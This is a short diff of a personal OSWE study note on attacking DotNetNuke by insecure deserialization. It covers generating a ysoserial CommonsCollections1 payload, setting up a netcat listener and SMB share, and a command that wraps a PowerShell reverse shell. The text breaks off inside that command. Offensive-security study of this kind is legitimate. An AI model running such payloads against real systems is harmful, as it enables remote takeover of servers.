dvdg6566/oswe/notion-backup/DotNetNuke cd1b7cf288124ab88a26c440104b282f/ysoserial net (Extra Mile 7 4 1 4) e11482ad25a147ddbc84f8dfcf7f6e18.md

 }
 ```

 We’ll use Ysoserial to generate our payload for the application.
 For the gadget type, we can use CommonCollections1 as the default — although brute-forcing some of the common ones would work too.
-Since Ysoserial’s CommonCollections doesn’t work in Java, we can use https://github.com/frohoff/ysoserial/issues/203 to swap between Java versions.
+Since Ysoserial’s CommonCollections doesn’t work in Java, we can use [https://github.com/frohoff/ysoserial/issues/203#issuecomment-1581591710](https://github.com/frohoff/ysoserial/issues/203#issuecomment-1581591710) to swap between Java versions.
+Remember, since Burp runs on Java, it’s important to reset our Java installation back to the default.

 Once we’re done, we simply setup our netcat listener and SMB share.

 ```bash
 java -jar ysoserial-all.jar CommonsCollections1 'powershell -e <reverse shell>' > payload